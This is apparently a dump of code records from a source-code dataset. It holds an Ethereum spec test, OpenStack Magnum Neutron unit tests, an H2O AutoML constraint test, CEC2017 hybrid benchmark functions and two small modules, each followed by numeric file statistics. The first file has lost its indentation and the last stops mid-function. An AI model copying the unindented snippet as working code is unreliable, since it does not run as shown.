from eth2spec.test.helpers.inactivity_scores import randomize_inactivity_scores
from eth2spec.test.helpers.rewards import leaking
import eth2spec.test.helpers.rewards as rewards_helpers
@with_altair_and_later
@spec_state_test
def test_random_inactivity_scores_0(spec, state):
randomize_inactivity_scores(spec, state, rng=Random(9999))
yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(9999))
@with_altair_and_later
@spec_state_test
def test_random_inactivity_scores_1(spec, state):
randomize_inactivity_scores(spec, state, rng=Random(10000))
yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(10000))
@with_altair_and_later
@spec_state_test
def test_half_zero_half_random_inactivity_scores(spec, state):
randomize_inactivity_scores(spec, state, rng=Random(10101))
half_val_point = len(state.validators) // 2
state.inactivity_scores = [0] * half_val_point + state.inactivity_scores[half_val_point:]
yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(10101))
@with_altair_and_later
@spec_state_test
def test_random_high_inactivity_scores(spec, state):
randomize_inactivity_scores(spec, state, minimum=500000, maximum=5000000, rng=Random(9998))
yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(9998))
@with_altair_and_later
@with_custom_state(balances_fn=low_balances, threshold_fn=lambda spec: spec.EJECTION_BALANCE)
@spec_test
@single_phase
def test_random_inactivity_scores_low_balances_0(spec, state):
randomize_inactivity_scores(spec, state, rng=Random(11111))
yield from rewards_helpers.run_test_full_random(spec, state)
@with_altair_and_later
@with_custom_state(balances_fn=low_balances, threshold_fn=lambda spec: spec.EJECTION_BALANCE)
@spec_test
@single_phase
def test_random_inactivity_scores_low_balances_1(spec, state):
randomize_inactivity_scores(spec, state, rng=Random(22222))
yield from rewards_helpers.run_test_full_random(spec, state)
@with_altair_and_later
@with_custom_state(balances_fn=misc_balances, threshold_fn=lambda spec: spec.EJECTION_BALANCE)
@spec_test
@single_phase
def test_full_random_misc_balances(spec, state):
randomize_inactivity_scores(spec, state, rng=Random(33333))
yield from rewards_helpers.run_test_full_random(spec, state)
#
# Leaking variants
#
@with_altair_and_later
@spec_state_test
@leaking()
def test_random_inactivity_scores_leaking_0(spec, state):
randomize_inactivity_scores(spec, state, rng=Random(9999))
yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(9999))
@with_altair_and_later
@spec_state_test
@leaking()
def test_random_inactivity_scores_leaking_1(spec, state):
randomize_inactivity_scores(spec, state, rng=Random(10000))
yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(10000))
@with_altair_and_later
@spec_state_test
@leaking()
def test_half_zero_half_random_inactivity_scores_leaking(spec, state):
randomize_inactivity_scores(spec, state, rng=Random(10101))
half_val_point = len(state.validators) // 2
state.inactivity_scores = [0] * half_val_point + state.inactivity_scores[half_val_point:]
yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(10101))
@with_altair_and_later
@spec_state_test
@leaking()
def test_random_high_inactivity_scores_leaking(spec, state):
randomize_inactivity_scores(spec, state, minimum=500000, maximum=5000000, rng=Random(9998))
yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(9998))
@with_altair_and_later
@spec_state_test
@leaking(epochs=5)
def test_random_high_inactivity_scores_leaking_5_epochs(spec, state):
randomize_inactivity_scores(spec, state, minimum=500000, maximum=5000000, rng=Random(9998))
yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(9998))
| 34.361345
| 95
| 0.816581
| 596
| 4,089
| 5.192953
| 0.098993
| 0.133764
| 0.06979
| 0.104685
| 0.887561
| 0.880452
| 0.87916
| 0.864943
| 0.84685
| 0.817448
| 0
| 0.040661
| 0.097823
| 4,089
| 118
| 96
| 34.652542
| 0.798319
| 0.003913
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.137931
| false
| 0
| 0.057471
| 0
| 0.195402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
732babc5e94304f3c0074fa955851d6f98a6ccac
| 12,659
|
py
|
Python
|
magnum/tests/unit/common/test_neutron.py
|
ajmadsen/magnum
|
042d2ad14489afcecf0a3bc4038e2333e2acb3fb
|
[
"Apache-2.0"
] | 319
|
2015-04-01T01:36:14.000Z
|
2022-01-18T13:21:46.000Z
|
magnum/tests/unit/common/test_neutron.py
|
ajmadsen/magnum
|
042d2ad14489afcecf0a3bc4038e2333e2acb3fb
|
[
"Apache-2.0"
] | 10
|
2015-06-05T20:12:46.000Z
|
2018-10-17T09:14:22.000Z
|
magnum/tests/unit/common/test_neutron.py
|
ajmadsen/magnum
|
042d2ad14489afcecf0a3bc4038e2333e2acb3fb
|
[
"Apache-2.0"
] | 254
|
2015-03-30T13:56:06.000Z
|
2022-03-26T03:40:22.000Z
|
# Copyright 2019 Catalyst Cloud Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
from magnum.common import exception
from magnum.common import neutron
from magnum import objects
from magnum.tests import base
from magnum.tests.unit.db import utils
class NeutronTest(base.TestCase):
def setUp(self):
super(NeutronTest, self).setUp()
cluster_dict = utils.get_test_cluster(node_count=1)
nodegroups_dict = utils.get_nodegroups_for_cluster(node_count=1)
self.cluster = objects.Cluster(self.context, **cluster_dict)
self.nodegroups = [
objects.NodeGroup(self.context, **nodegroups_dict['master']),
objects.NodeGroup(self.context, **nodegroups_dict['worker'])
]
@mock.patch('magnum.common.clients.OpenStackClients')
def test_delete_floatingip(self, mock_clients):
mock_nclient = mock.MagicMock()
fake_port_id = "b4518944-c2cf-4c69-a1e3-774041fd5d14"
fake_fip_id = "0f8c6849-af85-424c-aa8e-745ade9a46a7"
mock_nclient.list_floatingips.return_value = {
'floatingips': [
{
'router_id': '6ed4f7ef-b8c3-4711-93cf-d53cf0e8bdf5',
'status': 'ACTIVE',
'description': 'Floating IP for Kubernetes external '
'service ad3080723f1c211e88adbfa163ee1203 '
'from cluster %s' % self.cluster.uuid,
'tags': [],
'tenant_id': 'cd08a539b7c845ddb92c5d08752101d1',
'floating_network_id': 'd0b9a8c5-33e5-4ce1-869a-1e2ec7c2f'
'74b',
'port_details': {
'status': 'ACTIVE',
'name': 'test-k8s-master',
'admin_state_up': True,
'network_id': '7b9110b5-90a2-40bc-b892-07d641387760 ',
'device_owner': 'compute:nova',
'mac_address': 'fa:16:3e:6f:ad:6c',
'device_id': 'a5c1689f-dd76-4164-8562-6990071701cd'
},
'fixed_ip_address': '10.0.0.4',
'floating_ip_address': '172.24.4.74',
'revision_number': 14,
'project_id': 'cd08a539b7c845ddb92c5d08752101d1',
'port_id': fake_port_id,
'id': fake_fip_id
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
neutron.delete_floatingip(self.context, fake_port_id, self.cluster)
mock_nclient.delete_floatingip.assert_called_once_with(fake_fip_id)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_delete_floatingip_empty(self, mock_clients):
mock_nclient = mock.MagicMock()
fake_port_id = "b4518944-c2cf-4c69-a1e3-774041fd5d14"
mock_nclient.list_floatingips.return_value = {
'floatingips': []
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
neutron.delete_floatingip(self.context, fake_port_id, self.cluster)
self.assertFalse(mock_nclient.delete_floatingip.called)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_delete_floatingip_exception(self, mock_clients):
mock_nclient = mock.MagicMock()
fake_port_id = "b4518944-c2cf-4c69-a1e3-774041fd5d14"
fake_fip_id = "0f8c6849-af85-424c-aa8e-745ade9a46a7"
mock_nclient.list_floatingips.return_value = {
'floatingips': [
{
'router_id': '6ed4f7ef-b8c3-4711-93cf-d53cf0e8bdf5',
'status': 'ACTIVE',
'description': 'Floating IP for Kubernetes external '
'service ad3080723f1c211e88adbfa163ee1203 '
'from cluster %s' % self.cluster.uuid,
'tags': [],
'tenant_id': 'cd08a539b7c845ddb92c5d08752101d1',
'floating_network_id': 'd0b9a8c5-33e5-4ce1-869a-1e2ec7c2f'
'74b',
'port_details': {
'status': 'ACTIVE',
'name': 'test-k8s-master',
'admin_state_up': True,
'network_id': '7b9110b5-90a2-40bc-b892-07d641387760 ',
'device_owner': 'compute:nova',
'mac_address': 'fa:16:3e:6f:ad:6c',
'device_id': 'a5c1689f-dd76-4164-8562-6990071701cd'
},
'fixed_ip_address': '10.0.0.4',
'floating_ip_address': '172.24.4.74',
'revision_number': 14,
'project_id': 'cd08a539b7c845ddb92c5d08752101d1',
'port_id': fake_port_id,
'id': fake_fip_id
}
]
}
mock_nclient.delete_floatingip.side_effect = Exception
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
self.assertRaises(
exception.PreDeletionFailed,
neutron.delete_floatingip,
self.context,
fake_port_id,
self.cluster
)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_external_network_id(self, mock_clients):
fake_name = "fake_network"
fake_id = "24fe5da0-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_networks.return_value = {
'networks': [
{
'id': fake_id,
'name': fake_name,
'router:external': True
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
network_id = neutron.get_external_network_id(self.context, fake_name)
self.assertEqual(fake_id, network_id)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_external_network_id_notfound(self, mock_clients):
fake_name = "fake_network"
fake_id = "24fe5da0-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_networks.return_value = {
'networks': [
{
'id': fake_id,
'name': fake_name,
'router:external': True
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
self.assertRaises(
exception.ExternalNetworkNotFound,
neutron.get_external_network_id,
self.context,
"another_network"
)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_external_network_id_conflict(self, mock_clients):
fake_name = "fake_network"
fake_id_1 = "24fe5da0-1ac0-11e9-84cd-00224d6b7bc1"
fake_id_2 = "93781f82-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_networks.return_value = {
'networks': [
{
'id': fake_id_1,
'name': fake_name,
'router:external': True
},
{
'id': fake_id_2,
'name': fake_name,
'router:external': True
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
self.assertRaises(
exception.Conflict,
neutron.get_external_network_id,
self.context,
fake_name
)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_fixed_network_name(self, mock_clients):
fake_name = "fake_network"
fake_id = "24fe5da0-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_networks.return_value = {
'networks': [
{
'id': fake_id,
'name': fake_name,
'router:external': False
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
network_name = neutron.get_fixed_network_name(self.context, fake_id)
self.assertEqual(fake_name, network_name)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_fixed_network_name_notfound(self, mock_clients):
fake_name = "fake_network"
fake_id = "24fe5da0-1ac0-11e9-84cd-00224d6b7bc1"
another_fake_id = "34fe5da0-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_networks.return_value = {
'networks': [
{
'id': fake_id,
'name': fake_name,
'router:external': False
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
self.assertRaises(
exception.FixedNetworkNotFound,
neutron.get_fixed_network_name,
self.context,
another_fake_id
)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_fixed_subnet_id(self, mock_clients):
fake_name = "fake_subnet"
fake_id = "35ee5da0-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_subnets.return_value = {
'subnets': [
{
'id': fake_id,
'name': fake_name,
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
subnet_id = neutron.get_fixed_subnet_id(self.context, fake_name)
self.assertEqual(fake_id, subnet_id)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_fixed_subnet_id_notfound(self, mock_clients):
fake_name = "fake_subnet"
fake_id = "35ee5da0-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_subnets.return_value = {
'subnets': [
{
'id': fake_id,
'name': fake_name,
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
self.assertRaises(
exception.FixedSubnetNotFound,
neutron.get_fixed_subnet_id,
self.context,
"another_subnet"
)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_fixed_subnet_id_conflict(self, mock_clients):
fake_name = "fake_subnet"
fake_id_1 = "35ee5da0-1ac0-11e9-84cd-00224d6b7bc1"
fake_id_2 = "93781f82-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_subnets.return_value = {
'subnets': [
{
'id': fake_id_1,
'name': fake_name,
},
{
'id': fake_id_2,
'name': fake_name,
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
self.assertRaises(
exception.Conflict,
neutron.get_fixed_subnet_id,
self.context,
fake_name
)
| 35.963068
| 78
| 0.55581
| 1,234
| 12,659
| 5.43517
| 0.175851
| 0.059043
| 0.048159
| 0.034442
| 0.821381
| 0.818995
| 0.804085
| 0.7686
| 0.765022
| 0.72402
| 0
| 0.08166
| 0.350897
| 12,659
| 351
| 79
| 36.065527
| 0.734575
| 0.046054
| 0
| 0.647458
| 0
| 0
| 0.210081
| 0.121705
| 0
| 0
| 0
| 0
| 0.037288
| 1
| 0.040678
| false
| 0
| 0.020339
| 0
| 0.064407
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
733e6a17282d9c3babef01f0e484c5bff3b41f16
| 87
|
py
|
Python
|
eds/openmtc-gevent/common/openmtc-etsi/src/openmtc_etsi/serializer/xml/exc.py
|
piyush82/elastest-device-emulator-service
|
b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7
|
[
"Apache-2.0"
] | null | null | null |
eds/openmtc-gevent/common/openmtc-etsi/src/openmtc_etsi/serializer/xml/exc.py
|
piyush82/elastest-device-emulator-service
|
b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7
|
[
"Apache-2.0"
] | null | null | null |
eds/openmtc-gevent/common/openmtc-etsi/src/openmtc_etsi/serializer/xml/exc.py
|
piyush82/elastest-device-emulator-service
|
b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7
|
[
"Apache-2.0"
] | null | null | null |
from openmtc_etsi.exc import SCLSyntaxError
class XMLError(SCLSyntaxError):
pass
| 14.5
| 43
| 0.804598
| 10
| 87
| 6.9
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149425
| 87
| 5
| 44
| 17.4
| 0.932432
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
b41799e881a66a8ef586c38e9d0efec9589ae733
| 94
|
py
|
Python
|
db/tests/fixtures/faq_category.py
|
matchd-ch/matchd-backend
|
84be4aab1b4708cae50a8988301b15df877c8db0
|
[
"Apache-2.0"
] | 1
|
2022-03-03T09:55:57.000Z
|
2022-03-03T09:55:57.000Z
|
db/tests/fixtures/faq_category.py
|
matchd-ch/matchd-backend
|
84be4aab1b4708cae50a8988301b15df877c8db0
|
[
"Apache-2.0"
] | 7
|
2022-02-09T10:44:53.000Z
|
2022-03-28T03:29:43.000Z
|
db/tests/fixtures/faq_category.py
|
matchd-ch/matchd-backend
|
84be4aab1b4708cae50a8988301b15df877c8db0
|
[
"Apache-2.0"
] | null | null | null |
import pytest
@pytest.fixture
def faq_category_valid_args():
return {'name': 'General'}
| 13.428571
| 30
| 0.723404
| 12
| 94
| 5.416667
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148936
| 94
| 6
| 31
| 15.666667
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0.117021
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
b41a89a54fe8a1b25e8c553fb3cda69a73033c63
| 3,276
|
py
|
Python
|
h2o-py/tests/testdir_algos/automl/pyunit_automl_monotone_constraints.py
|
vishalbelsare/h2o-3
|
9322fb0f4c0e2358449e339a434f607d524c69fa
|
[
"Apache-2.0"
] | 1
|
2022-03-15T06:08:14.000Z
|
2022-03-15T06:08:14.000Z
|
h2o-py/tests/testdir_algos/automl/pyunit_automl_monotone_constraints.py
|
vishalbelsare/h2o-3
|
9322fb0f4c0e2358449e339a434f607d524c69fa
|
[
"Apache-2.0"
] | 58
|
2021-10-01T12:43:37.000Z
|
2021-12-08T22:58:43.000Z
|
h2o-py/tests/testdir_algos/automl/pyunit_automl_monotone_constraints.py
|
vishalbelsare/h2o-3
|
9322fb0f4c0e2358449e339a434f607d524c69fa
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
import sys, os
import re
sys.path.insert(1, os.path.join("..","..",".."))
import h2o
import h2o.exceptions
from h2o.automl import H2OAutoML
from tests import pyunit_utils as pu
from _automl_utils import import_dataset, get_partitioned_model_names
max_models = 5
def test_monotone_constraints():
ds = import_dataset()
aml = H2OAutoML(project_name="py_monotone_constraints",
monotone_constraints=dict(AGE=1, VOL=-1), # constraints just for the sake of testing
max_models=6,
seed=1)
aml.train(y=ds.target, training_frame=ds.train)
model_names = get_partitioned_model_names(aml.leaderboard).all
models_supporting_monotone_constraints = [n for n in model_names if re.match(r"GBM|XGBoost", n)]
assert len(models_supporting_monotone_constraints) < len(model_names), \
"models not supporting the constraint should not have been skipped"
for m in models_supporting_monotone_constraints:
model = h2o.get_model(m)
value = next(v['actual'] for n, v in model.params.items() if n == 'monotone_constraints')
assert isinstance(value, list)
assert len(value) == 2
age = next((v for v in value if v['key'] == 'AGE'), None)
assert age is not None
assert age['value'] == 1.0
vol = next((v for v in value if v['key'] == 'VOL'), None)
assert vol is not None
assert vol['value'] == -1.0
def test_monotone_constraints_can_be_passed_as_algo_parameter():
ds = import_dataset()
aml = H2OAutoML(project_name="py_monotone_constraints",
algo_parameters=dict(
monotone_constraints=dict(AGE=1, VOL=-1), # constraints just for the sake of testing
# ntrees=10,
),
max_models=6,
seed=1)
aml.train(y=ds.target, training_frame=ds.train)
model_names = get_partitioned_model_names(aml.leaderboard).all
models_supporting_monotone_constraints = [n for n in model_names if re.match(r"GBM|XGBoost", n)]
assert len(models_supporting_monotone_constraints) < len(model_names), \
"models not supporting the constraint should not have been skipped"
for m in models_supporting_monotone_constraints:
model = h2o.get_model(m)
value = next(v['actual'] for n, v in model.params.items() if n == 'monotone_constraints')
# print(param)
assert isinstance(value, list)
assert len(value) == 2
age = next((v for v in value if v['key'] == 'AGE'), None)
assert age is not None
assert age['value'] == 1.0
vol = next((v for v in value if v['key'] == 'VOL'), None)
assert vol is not None
assert vol['value'] == -1.0
# models_supporting_ntrees = [n for n in model_names if re.match(r"DRF|GBM|XGBoost|XRT", n)]
# assert len(models_supporting_ntrees) > 0
# for m in models_supporting_ntrees:
# model = h2o.get_model(m)
# value = next(v['actual'] for n, v in model.params.items() if n == 'ntrees')
# assert value == 10
pu.run_tests([
test_monotone_constraints,
test_monotone_constraints_can_be_passed_as_algo_parameter,
])
| 41.468354
| 109
| 0.648657
| 459
| 3,276
| 4.431373
| 0.213508
| 0.149459
| 0.070796
| 0.103245
| 0.806293
| 0.782694
| 0.782694
| 0.782694
| 0.782694
| 0.734513
| 0
| 0.013765
| 0.246032
| 3,276
| 78
| 110
| 42
| 0.809717
| 0.123321
| 0
| 0.7
| 0
| 0
| 0.104858
| 0.016078
| 0
| 0
| 0
| 0
| 0.233333
| 1
| 0.033333
| false
| 0.033333
| 0.166667
| 0
| 0.2
| 0.016667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b42a2262415a814af7735e6c00c6073e77532dbd
| 12,648
|
py
|
Python
|
cec2017/hybrid.py
|
tilleyd/cec2017-py
|
5b47cc36c3723c9b6c2e6dd26328b2de45e4993f
|
[
"MIT"
] | 16
|
2020-04-06T04:34:38.000Z
|
2022-03-24T12:29:57.000Z
|
cec2017/hybrid.py
|
lukaa12/cec2017-py
|
0c241240bfaf11d0f42a607a235b1825ad11e4f7
|
[
"MIT"
] | 3
|
2021-07-17T20:46:48.000Z
|
2022-03-28T06:48:47.000Z
|
cec2017/hybrid.py
|
lukaa12/cec2017-py
|
0c241240bfaf11d0f42a607a235b1825ad11e4f7
|
[
"MIT"
] | 4
|
2021-05-26T19:32:53.000Z
|
2022-03-24T13:27:30.000Z
|
# cec2017.hybrid
# Author: Duncan Tilley
# Hybrid function definitions, f11 to f20
from . import basic
from . import transforms
import numpy as np
def _shuffle_and_partition(x, shuffle, partitions):
"""
First applies the given permutation, then splits x into partitions given
the percentages.
Args:
x (array): Input vector.
shuffle (array): Shuffle vector.
partitions (list): List of percentages. Assumed to add up to 1.0.
Returns:
(list of arrays): The partitions of x after shuffling.
"""
nx = len(x)
# shuffle
xs = np.zeros(x.shape)
for i in range(0, nx):
xs[i] = x[shuffle[i]]
# and partition
parts = []
start, end = 0, 0
for p in partitions[:-1]:
end = start + int(np.ceil(p * nx))
parts.append(xs[start:end])
start = end
parts.append(xs[end:])
return parts
def f11(x, rotation=None, shift=None, shuffle=None):
"""
Hybrid Function 1 (N=3)
Args:
x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
rotation (matrix): Optional rotation matrix. If None (default), the
official matrix from the benchmark suite will be used.
shift (array): Optional shift vector. If None (default), the official
vector from the benchmark suite will be used.
shuffle (array): Optionbal shuffle vector. If None (default), the
official permutation vector from the benchmark suite will be used.
"""
nx = len(x)
if rotation is None:
rotation = transforms.rotations[nx][10]
if shift is None:
shift = transforms.shifts[10][:nx]
if shuffle is None:
shuffle = transforms.shuffles[nx][0]
x_transformed = np.matmul(rotation, x - shift)
x_parts = _shuffle_and_partition(x_transformed, shuffle, [0.2, 0.4, 0.4])
y = basic.zakharov(x_parts[0])
y += basic.rosenbrock(x_parts[1])
y += basic.rastrigin(x_parts[2])
return y + 1100.0
def f12(x, rotation=None, shift=None, shuffle=None):
"""
Hybrid Function 2 (N=3)
Args:
x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
rotation (matrix): Optional rotation matrix. If None (default), the
official matrix from the benchmark suite will be used.
shift (array): Optional shift vector. If None (default), the official
vector from the benchmark suite will be used.
shuffle (array): Optionbal shuffle vector. If None (default), the
official permutation vector from the benchmark suite will be used.
"""
nx = len(x)
if rotation is None:
rotation = transforms.rotations[nx][11]
if shift is None:
shift = transforms.shifts[11][:nx]
if shuffle is None:
shuffle = transforms.shuffles[nx][1]
x_transformed = np.matmul(rotation, x - shift)
x_parts = _shuffle_and_partition(x_transformed, shuffle, [0.3, 0.3, 0.4])
y = basic.high_conditioned_elliptic(x_parts[0])
y += basic.modified_schwefel(x_parts[1])
y += basic.bent_cigar(x_parts[2])
return y + 1200.0
def f13(x, rotation=None, shift=None, shuffle=None):
"""
Hybrid Function 3 (N=3)
Args:
x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
rotation (matrix): Optional rotation matrix. If None (default), the
official matrix from the benchmark suite will be used.
shift (array): Optional shift vector. If None (default), the official
vector from the benchmark suite will be used.
shuffle (array): Optionbal shuffle vector. If None (default), the
official permutation vector from the benchmark suite will be used.
"""
nx = len(x)
if rotation is None:
rotation = transforms.rotations[nx][12]
if shift is None:
shift = transforms.shifts[12][:nx]
if shuffle is None:
shuffle = transforms.shuffles[nx][2]
x_transformed = np.matmul(rotation, x - shift)
x_parts = _shuffle_and_partition(x_transformed, shuffle, [0.3, 0.3, 0.4])
y = basic.bent_cigar(x_parts[0])
y += basic.rosenbrock(x_parts[1])
y += basic.lunacek_bi_rastrigin(x_parts[2])
return y + 1300.0
def f14(x, rotation=None, shift=None, shuffle=None):
"""
Hybrid Function 4 (N=4)
Args:
x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
rotation (matrix): Optional rotation matrix. If None (default), the
official matrix from the benchmark suite will be used.
shift (array): Optional shift vector. If None (default), the official
vector from the benchmark suite will be used.
shuffle (array): Optionbal shuffle vector. If None (default), the
official permutation vector from the benchmark suite will be used.
"""
nx = len(x)
if rotation is None:
rotation = transforms.rotations[nx][13]
if shift is None:
shift = transforms.shifts[13][:nx]
if shuffle is None:
shuffle = transforms.shuffles[nx][3]
x_transformed = np.matmul(rotation, x - shift)
x_parts = _shuffle_and_partition(x_transformed, shuffle, [0.2, 0.2, 0.2, 0.4])
y = basic.high_conditioned_elliptic(x_parts[0])
y += basic.ackley(x_parts[1])
y += basic.schaffers_f7(x_parts[2])
y += basic.rastrigin(x_parts[3])
return y + 1400.0
def f15(x, rotation=None, shift=None, shuffle=None):
"""
Hybrid Function 5 (N=4)
Args:
x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
rotation (matrix): Optional rotation matrix. If None (default), the
official matrix from the benchmark suite will be used.
shift (array): Optional shift vector. If None (default), the official
vector from the benchmark suite will be used.
shuffle (array): Optionbal shuffle vector. If None (default), the
official permutation vector from the benchmark suite will be used.
"""
nx = len(x)
if rotation is None:
rotation = transforms.rotations[nx][14]
if shift is None:
shift = transforms.shifts[14][:nx]
if shuffle is None:
shuffle = transforms.shuffles[nx][4]
x_transformed = np.matmul(rotation, x - shift)
x_parts = _shuffle_and_partition(x_transformed, shuffle, [0.2, 0.2, 0.3, 0.3])
y = basic.bent_cigar(x_parts[0])
y += basic.h_g_bat(x_parts[1])
y += basic.rastrigin(x_parts[2])
y += basic.rosenbrock(x_parts[3])
return y + 1500.0
def f16(x, rotation=None, shift=None, shuffle=None):
"""
Hybrid Function 6 (N=4)
Args:
x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
rotation (matrix): Optional rotation matrix. If None (default), the
official matrix from the benchmark suite will be used.
shift (array): Optional shift vector. If None (default), the official
vector from the benchmark suite will be used.
shuffle (array): Optionbal shuffle vector. If None (default), the
official permutation vector from the benchmark suite will be used.
"""
nx = len(x)
if rotation is None:
rotation = transforms.rotations[nx][15]
if shift is None:
shift = transforms.shifts[15][:nx]
if shuffle is None:
shuffle = transforms.shuffles[nx][5]
x_transformed = np.matmul(rotation, x - shift)
x_parts = _shuffle_and_partition(x_transformed, shuffle, [0.2, 0.2, 0.3, 0.3])
y = basic.expanded_schaffers_f6(x_parts[0])
y += basic.h_g_bat(x_parts[1])
y += basic.rosenbrock(x_parts[2])
y += basic.modified_schwefel(x_parts[3])
return y + 1600.0
def f17(x, rotation=None, shift=None, shuffle=None):
"""
Hybrid Function 7 (N=5)
Args:
x (array): Input vector of dimension 2, 10, 20, 30, 50 or 100.
rotation (matrix): Optional rotation matrix. If None (default), the
official matrix from the benchmark suite will be used.
shift (array): Optional shift vector. If None (default), the official
vector from the benchmark suite will be used.
shuffle (array): Optionbal shuffle vector. If None (default), the
official permutation vector from the benchmark suite will be used.
"""
nx = len(x)
if rotation is None:
rotation = transforms.rotations[nx][16]
if shift is None:
shift = transforms.shifts[16][:nx]
if shuffle is None:
shuffle = transforms.shuffles[nx][6]
x_transformed = np.matmul(rotation, x - shift)
x_parts = _shuffle_and_partition(x_transformed, shuffle, [0.1, 0.2, 0.2, 0.2, 0.3])
y = basic.katsuura(x_parts[0])
y += basic.ackley(x_parts[1])
y += basic.expanded_griewanks_plus_rosenbrock(x_parts[2])
y += basic.modified_schwefel(x_parts[3])
y += basic.rastrigin(x_parts[4])
return y + 1700.0
def f18(x, rotation=None, shift=None, shuffle=None):
"""
Hybrid Function 8 (N=5)
Args:
